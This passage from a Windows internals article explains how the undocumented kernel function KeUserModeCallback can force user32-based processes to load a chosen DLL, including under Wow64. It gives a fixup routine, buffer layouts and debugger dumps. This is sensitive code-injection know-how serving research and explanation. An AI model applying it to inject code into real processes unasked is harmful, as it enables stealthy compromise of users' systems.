void FixupCallbackPointers(_USERHOOK_s *pData)
{
LPWORD offsetPointers;
DWORD fixup;
offsetPointers = (LPBYTE)pData + pData->offCbkPtrs;
for(fixup=0;fixup < pData->dwFixupsCount;fixup++)
{
pData[*offsetPointers] += (LPVOID)pData;
offsetPointers++;
}
}

Load library-specific parameters

The first parameter in the dynamic part of the input buffer given to KeUserModeCallback is the name of the module to load; it is specified in the lpDLLPath field of the structure. The module is eventually loaded by the call to the kernel32!LoadLibraryExW function.

The second parameter passed in the buffer describes a function to call once the library is loaded and depends on the operating system version.

On Windows XP, the field (lpfnNotify) is an offset relative to the loaded module of the function to call. Starting from Windows Vista, the field (lpInitFunctionName) is the name of the function to call; this function must be exported because it is retrieved with the help of GetProcAddress.

To skip the initialization function call, simply specify a 0 value for lpfnNotify on Windows XP or specify no relocation for the function name (dwFixupsCount = 1 and offCbk[1] = 0) starting from Windows Vista.

Output buffer

On output, the KeUserModeCallback fills the OutputBuffer and OutputLength parameters with the results of the call if it succeeds.

For the load library case, the contents of the whole output buffer has not been investigated. However, the beginning of the output buffer matches the structure:

typedef struct _LOAD_OUTPUT
{
LPVOID lpBaseAddress;

} _LOAD_OUTPUT_s;

The lpBaseAddress field contains the base address of the loaded module.


What about Wow64?

What we described so far is relevant for 32-bit processes on 32-bit operating systems and 64-bit processes on 64-bit systems. But what about 32-bit processes on 64-bit systems?

The good news is that it works equally from the kernel point-of-view, so what we explained is still relevant.

In a Wow64 process, the first change is that the KernelCallbackTable field of the Process Environment Block now points to wow64win module functions:

kd> dps 0x00000000`73e51510 L0n105
00000000`73e51510 00000000`73e82894 wow64win!whcbfnCOPYDATA
00000000`73e51518 00000000`73e82a28 wow64win!whcbfnCOPYGLOBALDATA
...
00000000`73e516a0 00000000`73e87dc8 wow64win!whcbClientCopyDDEIn1
00000000`73e516a8 00000000`73e87f78 wow64win!whcbClientCopyDDEIn2
00000000`73e516b0 00000000`73e880b8 wow64win!whcbClientCopyDDEOut1
00000000`73e516b8 00000000`73e88280 wow64win!whcbClientCopyDDEOut2
00000000`73e516c0 00000000`73e883c0 wow64win!whcbClientCopyImage
00000000`73e516c8 00000000`73e884e8 wow64win!whcbClientEventCallback
00000000`73e516d0 00000000`73e8862c wow64win!whcbClientFindMnemChar
00000000`73e516d8 00000000`73e8878c wow64win!whcbClientFreeDDEHandle
00000000`73e516e0 00000000`73e888a4 wow64win!whcbClientFreeLibrary
00000000`73e516e8 00000000`73e889b4 wow64win!whcbClientGetCharsetInfo
00000000`73e516f0 00000000`73e88aec wow64win!whcbClientGetDDEFlags
00000000`73e516f8 00000000`73e88c04 wow64win!whcbClientGetDDEHookData
00000000`73e51700 00000000`73e88d6c wow64win!whcbClientGetListboxString
00000000`73e51708 00000000`73e88f14 wow64win!whcbClientGetMessageMPH
00000000`73e51710 00000000`73e89088 wow64win!whcbClientLoadImage
00000000`73e51718 00000000`73e8920c wow64win!whcbClientLoadLibrary
00000000`73e51720 00000000`73e89370 wow64win!whcbClientLoadMenu
00000000`73e51728 00000000`73e894c4 wow64win!whcbClientLoadLocalT1Fonts
00000000`73e51730 00000000`73e895ac wow64win!whcbClientPSMTextOut
00000000`73e51738 00000000`73e89718 wow64win!whcbClientLpkDrawTextEx
...
00000000`73e51850 00000000`73e8c6a8 wow64win!whcbfnINPGESTURENOTIFYSTRUCT

What these functions do is performing an extra-marshalling between 64 and 32-bit structures.

Regarding the load library functionality, the wow64win!whcbClientLoadLibrary function first calls wow64win!FixupCaptureBuf64 which resolves the relative offsets.

The original buffer contains the raw data as received by the kernel:

0:000> db 00000000006fdde8 L00000000000000c8
00000000`006fdde8 c8 00 00 00 70 00 00 00-02 00 00 00 00 00 00 00 ....p...........
00000000`006fddf8 f0 d0 e1 02 80 f8 ff ff-48 00 00 00 00 00 00 00 ........H.......
00000000`006fde08 00 00 00 00 00 00 00 00-3e 00 40 00 00 00 00 00 ........>.@.....
00000000`006fde18 58 00 00 00 00 00 00 00-20 00 22 00 00 00 00 00 X....... .".....
00000000`006fde28 98 00 00 00 00 00 00 00-30 00 00 00 40 00 00 00 ........0...@...
00000000`006fde38 00 00 00 00 00 00 00 00-43 00 3a 00 5c 00 57 00 ........C.:.\.W.
00000000`006fde48 69 00 6e 00 64 00 6f 00-77 00 73 00 5c 00 73 00 i.n.d.o.w.s.\.s.
00000000`006fde58 79 00 73 00 74 00 65 00-6d 00 33 00 32 00 5c 00 y.s.t.e.m.3.2.\.
00000000`006fde68 75 00 78 00 74 00 68 00-65 00 6d 00 65 00 2e 00 u.x.t.h.e.m.e...
00000000`006fde78 64 00 6c 00 6c 00 00 00-54 00 68 00 65 00 6d 00 d.l.l...T.h.e.m.
00000000`006fde88 65 00 49 00 6e 00 69 00-74 00 41 00 70 00 69 00 e.I.n.i.t.A.p.i.
00000000`006fde98 48 00 6f 00 6f 00 6b 00-00 00 00 00 00 00 00 00 H.o.o.k.........
00000000`006fdea8 00 00 00 00 00 00 00 00 ........

In the original buffer, 2 fix-ups are declared. The pseudo-pointers are 64-bit long (in yellow and green in the previous image).

wow64win!FixupCaptureBuf64 replaces the relative offsets with absolute addresses. Since all relocations are performed, it sets the number of fix-ups to ‘0’.

0:000> db 00000000006fdde8 Lc8
00000000`006fdde8 c8 00 00 00 70 00 00 00-00 00 00 00 00 00 00 00 ....p...........
00000000`006fddf8 f0 d0 e1 02 80 f8 ff ff-48 00 00 00 00 00 00 00 ........H.......
00000000`006fde08 00 00 00 00 00 00 00 00-3e 00 40 00 00 00 00 00 ........>.@.....
00000000`006fde18 40 de 6f 00 00 00 00 00-20 00 22 00 00 00 00 00 @.o..... .".....
00000000`006fde28 80 de 6f 00 00 00 00 00-30 00 00 00 40 00 00 00 ..o.....0...@...
00000000`006fde38 00 00 00 00 00 00 00 00-43 00 3a 00 5c 00 57 00 ........C.:.\.W.
00000000`006fde48 69 00 6e 00 64 00 6f 00-77 00 73 00 5c 00 73 00 i.n.d.o.w.s.\.s.
00000000`006fde58 79 00 73 00 74 00 65 00-6d 00 33 00 32 00 5c 00 y.s.t.e.m.3.2.\.
00000000`006fde68 75 00 78 00 74 00 68 00-65 00 6d 00 65 00 2e 00 u.x.t.h.e.m.e...
00000000`006fde78 64 00 6c 00 6c 00 00 00-54 00 68 00 65 00 6d 00 d.l.l...T.h.e.m.
00000000`006fde88 65 00 49 00 6e 00 69 00-74 00 41 00 70 00 69 00 e.I.n.i.t.A.p.i.
00000000`006fde98 48 00 6f 00 6f 00 6b 00-00 00 00 00 00 00 00 00 H.o.o.k.........
00000000`006fdea8 00 00 00 00 00 00 00 00 ........

The second step builds another buffer containing only the static part of the structure with a layout matching the 32-bit code expectations.

0:000> db 6fdd20 L28
00000000`006fdd20 c8 00 00 00 70 00 00 00-00 00 00 00 f0 d0 e1 02 ....p...........
00000000`006fdd30 48 00 00 00 00 00 00 00-3e 00 40 00 40 de 6f 00 H.......>.@.@.o.
00000000`006fdd40 20 00 22 00 80 de 6f 00 ."...o.

The control is then passed to the user32!__ClientLoadLibrary function that performs the operations as if it were running on a 32-bit operating system.

Since the loading of the specified module is performed as if it were called by the userland process, the standard restrictions and behaviors are applicable. In particular, DLL redirection is in effect and loading of a DLL in c:\Windows\System32 will be automatically redirected to c:\Windows\SysWOW64.


Conclusions

It is possible to use the KeUserModeCallback function to load a custom library in processes, provided they use the user32 module. In practice, nearly all end-user applications use this module so it should not be a strong constraint. Since this function and the associated parameters are not documented, this functionality is subject to change in the future versions (even if it did not change so much during the 15 past years).

If you are interested in investigating other methods of executing user-mode code from the kernel, you can also have a look at the 6-part articles published by Nynaeve.